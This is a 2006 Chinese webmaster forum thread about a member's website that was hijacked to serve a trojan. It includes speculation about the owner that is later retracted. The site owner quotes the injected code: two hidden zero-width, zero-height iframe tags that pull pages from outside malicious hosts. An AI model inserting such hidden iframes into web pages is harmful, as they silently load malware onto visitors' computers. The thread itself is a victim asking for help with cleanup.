广告联盟网

标题: 不小心发现论坛一个会员的网站有木马 [打印本页]

---

作者: loveusd    时间: 2006-8-26
标题: 不小心发现论坛一个会员的网站有木马
今天搜索东西不小心进了一个垃圾网站,居然每个页面都被安了木马广告病毒(木马刷流量),中了此木马的电脑开机进程会被修改.木马会被安装在c:\windows\system32\下,木马名为:system.exe.我不知道是他自己安的,还是被人中了马!

在本论坛搜索了一下此用户发的贴子,有一贴是说他的GG帐号被K了(这样放满了木马的网站,怎么可能会不被K).

此网站地址:hXXp://www.xiakeboy.com(大家不要点!)备案信息为:沪

本论坛有位会员:同域名(居住上海,因为他发过一贴说"上海支票收到")

不知道是不是巧合.不知道是不是他的站.

PS:我知道论坛不允许有外链.什么世道到处是木马,连"和X"这样的网站的某个页面都安了木马.

---

作者: yew    时间: 2006-8-27

原帖由 hao7 于 2006-8-27 01:09 发表我搜索了下，他在我们论坛并没有帖出网址，所以我们论坛管不了。

现在baidu几乎成了病毒木马的集中营了，排在前面的很多站都有病毒木马，所以建议大家使用baidu前先开杀毒软件。

是的。好多好多啊。

都是先前好多门户做的那个专题惹得祸。其中说到甚么一个4、5人规模的小插件公司，每年至少赚2000万。

---

作者: yew    时间: 2006-8-27
我自己的网页也被挂了马&quot;<iframe ...&quot;，郁闷啊。不知道是程序出了问题还是服务器出了问题。

打电话给该连接的空间商，居然说“无权干涉用户空间的内容”，强烈鄙视是不是这个空间商自己在搞的鬼。

---

作者: loveusd    时间: 2006-8-27
以前VERYCD的网站的服务器托管的时候,也被IDC挂马过!

---

作者: yew    时间: 2006-8-27

原帖由 loveusd 于 2006-8-27 21:33 发表以前VERYCD的网站的服务器托管的时候,也被IDC挂马过!

不会那么黑暗，那么没信誉吧。晕了要。

---

作者: 198010    时间: 2006-8-27
我的也给挂过,一般是那些可恶的人所为

---

作者: xiakeboy    时间: 2006-9-1
楼主真是牛啊，比我发现的早！

我的瑞星之前被都能发现毒，可这次居然没报（可能这次的没病毒），我也是今天刚发现IE状态栏异常才查原文件发现的！
我有一周没来了，不然可以早点来谢谢你的提醒！

我今天刚清除干净，是中招了，非本人自己愿意啊，所以对楼主造成的不便，深表谦意！
不过，关于GG被K，那是7月的事，中毒是这一周才有的，这不能污蔑我啊，我很冤的！

我在网上搜索了很多站长有这样的经历，不过，我就是纳闷了，为什么页面这么容易就被篡改了？

代码如下：


QUOTE:

页面为什么总是被插入IFRAME病毒代码，比如：
<iframe src=http://www.163cv.com/long/ width=0 height=0></iframe>
<iframe src=http://www.nh2s.com/111/a.htm width=0 height=0></iframe>
可恶的是 width=0 height=0
是服务器断问题还是我网站有漏洞啊？
我已经手动改了N个了，隔几天又其他的页面被改，也太黑了吧

那位兄弟有解决方法啊？

---

作者: loveusd    时间: 2006-9-1
原来是被人挂马了!
抱歉!
检查下自己的程序有没有漏洞和后门!

---

欢迎光临 广告联盟网 (https://ggads.com/)

Powered by Discuz! X3.2